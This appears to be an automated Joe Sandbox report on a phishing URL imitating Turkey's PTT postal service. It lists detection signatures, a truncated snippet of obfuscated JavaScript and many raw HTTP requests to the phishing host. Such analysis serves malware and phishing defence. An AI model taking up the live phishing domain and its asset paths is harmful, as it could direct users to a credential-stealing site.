Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://pttroqtr.top/help

Overview

General Information

Sample URL:http://pttroqtr.top/help
Analysis ID:1521185
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
HTML page contains obfuscated javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 3056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1636,i,8772611216806412330,10793707389040936366,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pttroqtr.top/help" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://pttroqtr.top/helpSlashNext: detection malicious, Label: Fraudulent Website type: Phishing & Social Engineering
Source: pttroqtr.topVirustotal: Detection: 5%Perma Link

Phishing

barindex
Source: https://pttroqtr.top/help/assets/37d8eb31JxKnW.jsHTTP Parser: const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c
Source: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxHTTP Parser: Number of links: 0
Source: https://pttroqtr.top/help/HTTP Parser: Base64 decoded: sts/UrunHizmet/Attachments/55/web sitesi alt logolar_3-06.png" class='ptt-productimage'></a></div><div class='transition ptt-productimage-holder col-lg-1 col-md-2 col-sm-3 col-xs-4'><a href="https://www.ptt.gov.tr/Sayfalar/Kargo/PttYurtIciKargoHizmetleri....
Source: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxHTTP Parser: Title: AloChat does not match URL
Source: https://pttroqtr.top/help/HTTP Parser: No favicon
Source: https://pttroqtr.top/help/HTTP Parser: No favicon
Source: https://pttroqtr.top/help/HTTP Parser: No favicon
Source: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxHTTP Parser: No favicon
Source: https://www.ptt.gov.tr/Sayfalar/Posta/UETS.aspxHTTP Parser: No favicon
Source: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxHTTP Parser: No <meta name="author".. found
Source: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49790 version: TLS 1.0
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49790 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /help HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/ HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f6170fbbkFGym.css HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/index-f5457718.js HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /help/assets/77985128JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/37d8eb31JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/index-f5457718.js HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/2dd339f2kFGym.css HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/4cd1ec68kFGym.css HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/c16a2af0JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/09bf01f8JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/ec21517bJxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f3c7e6fbJxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/77985128JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/37d8eb31JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/c27b6911JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/cbcdcea5JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/09bf01f8JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/ec21517bJxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/c16a2af0JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f3c7e6fbJxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/c27b6911JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/cbcdcea5JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/0e738ae1JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/MC45ODQ1NjY2NzE5MzU4MDAy HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/0e738ae1JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f4397cedkFGym.css HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjaQU HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/164f9b57JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8sjaQU HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1Host: pttroqtr.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttroqtr.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: whC+/smpod9BJ1y3VsqKpA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /help/frames/0/index.html HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://pttroqtr.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/164f9b57JxKnW.js HTTP/1.1Host: pttroqtr.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/8560f9bdkFGym.woff HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://pttroqtr.top/help/assets/2dd339f2kFGym.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /help/assets/f18e42bakFGym.woff HTTP/1.1Host: pttroqtr.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pttroqtr.topsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://pttroqtr.top/help/assets/2dd339f2kFGym.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
